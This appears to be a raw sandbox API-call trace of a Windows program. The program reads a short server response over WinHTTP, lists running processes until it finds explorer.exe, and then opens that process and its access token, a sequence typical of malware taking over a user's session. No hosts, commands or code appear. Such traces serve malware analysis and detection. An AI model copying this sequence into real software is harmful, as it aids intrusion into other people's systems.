	[0242.761] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0242.761] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
	[0242.761] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b75d8
	[0242.761] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x22b75d8, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x22b75d8*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0242.761] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0242.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22b75d8, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0242.761] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7980
	[0242.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22b75d8, cbMultiByte=3, lpWideCharStr=0x22b7980, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0242.761] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0242.761] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
	[0242.761] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b79b0
	[0242.761] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b79c8
	[0242.761] lstrcpynW (in: lpString1=0x22b79c8, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0242.761] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737ea8
	[0242.761] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1540) returned 1
	[0242.761] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1528) returned 1
	[0242.761] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c8728) returned 1
	[0242.761] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a67a0) returned 1
	[0242.762] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0030) returned 1
	[0242.762] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6378) returned 1
	[0242.762] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7980) returned 1
	[0242.762] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b79b0) returned 1
	[0242.762] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b75d8) returned 1
	[0242.762] lstrcmpW (lpString1=0x0, lpString2="68976058") returned -1
	[0242.762] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x690
	[0242.764] Process32FirstW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0242.765] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0242.765] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0242.766] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0242.766] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0242.767] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0242.767] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0242.768] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0242.768] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0242.769] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0242.769] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0242.770] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0242.770] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0242.771] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0242.771] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0242.772] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0242.772] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0242.773] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0242.773] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0242.774] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0242.774] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.775] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0242.775] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.776] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0242.776] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.777] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0242.777] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.778] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0242.778] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.779] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0242.779] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.779] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0242.779] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.780] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0242.780] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0242.781] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0242.781] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.782] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0242.782] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0242.783] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0242.783] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0242.784] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0242.784] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.785] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0242.785] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0242.786] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0242.786] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0242.787] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0242.787] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0242.788] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0242.788] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0242.789] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0242.789] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0242.790] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0242.790] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0242.790] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0242.790] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0242.791] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0242.791] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0242.792] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0242.792] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0242.793] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0242.793] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0242.794] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0242.794] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0242.795] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0242.795] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0242.796] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0242.796] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0242.797] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0242.797] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0242.798] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0242.798] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0242.799] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0242.799] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0242.816] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0242.816] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0242.816] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0242.817] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0242.817] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0242.817] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0242.818] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0242.818] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0242.819] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0242.819] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0242.820] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0242.820] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0242.821] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0242.821] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0242.822] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0242.822] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0242.823] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0242.823] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.824] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0242.824] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.825] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0242.825] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.826] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0242.826] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.827] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0242.827] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0242.827] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0242.827] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.828] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0242.828] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.829] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0242.829] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0242.830] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0242.830] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0242.831] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0242.831] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0242.832] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0242.832] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.833] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0242.833] Process32NextW (in: hSnapshot=0x690, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0242.834] CloseHandle (hObject=0x690) returned 1
	[0242.834] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b75d8
	[0242.834] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b79b0
	[0242.834] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311948
	[0242.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x690
	[0242.834] OpenProcessToken (in: ProcessHandle=0x690, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x6e4) returned 1
